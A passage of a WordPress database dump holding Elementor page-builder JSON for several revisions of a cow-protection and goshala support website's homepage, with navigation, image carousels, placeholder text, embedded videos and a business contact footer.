ements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\"},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10256,1714,'_elementor_page_assets','a:0:{}'),(10258,1715,'_elementor_edit_mode','builder'),(10259,1715,'_elementor_template_type','wp-page'),(10260,1715,'_elementor_version','3.7.8'),(10261,1715,'_wp_page_template','elementor_canvas'),(10262,1715,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10263,1715,'_elementor_page_assets','a:0:{}'),(10266,1716,'_elementor_edit_mode','builder'),(10267,1716,'_elementor_template_type','wp-page'),(10268,1716,'_elementor_version','3.7.8'),(10269,1716,'_wp_page_template','elementor_canvas'),(10270,1716,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\"